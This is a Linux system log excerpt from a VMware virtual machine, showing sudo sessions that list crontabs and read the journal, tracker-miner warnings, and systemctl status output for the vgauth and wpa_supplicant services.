Sep 16 19:36:52 dfa crontab[4419]: (dfa) LIST (dfa)
Sep 16 19:36:56 dfa sudo[4420]:      dfa : TTY=pts/2 ; PWD=/home/dfa ; USER=root ; COMMAND=/usr/bin/crontab -l
Sep 16 19:36:56 dfa sudo[4420]: pam_unix(sudo:session): session opened for user root(uid=0) by dfa(uid=1000)
Sep 16 19:36:56 dfa crontab[4422]: (root) LIST (root)
Sep 16 19:36:56 dfa sudo[4420]: pam_unix(sudo:session): session closed for user root
Sep 16 19:38:49 dfa sudo[4427]:      dfa : TTY=pts/2 ; PWD=/home/dfa ; USER=root ; COMMAND=/usr/bin/journalctl
Sep 16 19:38:49 dfa sudo[4427]: pam_unix(sudo:session): session opened for user root(uid=0) by dfa(uid=1000)
Sep 16 19:38:54 dfa sudo[4427]: pam_unix(sudo:session): session closed for user root
Sep 16 19:39:50 dfa tracker-miner-fs-3[4455]: (tracker-extract-3:4455): GLib-GIO-WARNING **: 19:39:50.985: Error creating IO channel for /proc/self/mountinfo: Invalid argument (g-io-error-quark, 13)
Sep 16 19:42:17 dfa tracker-miner-fs-3[4481]: (tracker-extract-3:4481): GLib-GIO-WARNING **: 19:42:17.587: Error creating IO channel for /proc/self/mountinfo: Invalid argument (g-io-error-quark, 13)

● vgauth.service - Authentication service for virtual machines hosted on VMware
     Loaded: loaded (/usr/lib/systemd/system/vgauth.service; enabled; preset: enabled)
     Active: active (running) since Tue 2025-09-16 19:17:20 MSK; 25min ago
       Docs: http://github.com/vmware/open-vm-tools
   Main PID: 746 (VGAuthService)
      Tasks: 1 (limit: 9377)
     Memory: 9.5M (peak: 9.7M)
        CPU: 48ms
     CGroup: /system.slice/vgauth.service
             └─746 /usr/bin/VGAuthService

Sep 16 19:17:20 dfa systemd[1]: Started vgauth.service - Authentication service for virtual machines hosted on VMware.
Sep 16 19:17:20 dfa VGAuthService[746]: Pref_Init: Using '/etc/vmware-tools/vgauth.conf' as preferences filepath
Sep 16 19:17:20 dfa VGAuthService[746]: Core dump limit set to -1
Sep 16 19:17:20 dfa VGAuthService[746]: INIT SERVICE
Sep 16 19:17:20 dfa VGAuthService[746]: Using '/var/lib/vmware/VGAuth/aliasStore' for alias store root directory
Sep 16 19:17:22 dfa VGAuthService[746]: LoadCatalogAndSchema: Using '/etc/vmware-tools/vgauth/schemas' for SAML schemas
Sep 16 19:17:22 dfa VGAuthService[746]: LoadPrefs: Allowing 300 of clock skew for SAML date validation
Sep 16 19:17:22 dfa VGAuthService[746]: SAML_Init: Using xmlsec1 1.2.39 for XML signature support
Sep 16 19:17:22 dfa VGAuthService[746]: ServiceNetworkCreateSocketDir: Created socket directory '/var/run/vmware'
Sep 16 19:17:22 dfa VGAuthService[746]: BEGIN SERVICE

● wpa_supplicant.service - WPA supplicant
     Loaded: loaded (/usr/lib/systemd/system/wpa_supplicant.service; enabled; preset: enabled)
     Active: active (running) since Tue 2025-09-16 19:17:23 MSK; 25min ago
   Main PID: 1242 (wpa_supplicant)
      Tasks: 1 (limit: 9377)
     Memory: 3.5M (peak: 3.6M)
        CPU: 33ms
     CGroup: /system.slice/wpa_supplicant.service
             └─1242 /usr/sbin/wpa_supplicant -u -s -O "DIR=/run/wpa_supplicant GROUP=netdev"

Sep 16 19:17:23 dfa systemd[1]: Starting wpa_supplicant.service - WPA supplicant...
Sep 16 19:17:23 dfa systemd[1]: Started wpa_supplicant.service - WPA supplicant.
Sep 16 19:17:23 dfa wpa_supplicant[1242]: Successfully initialized wpa_supplicant
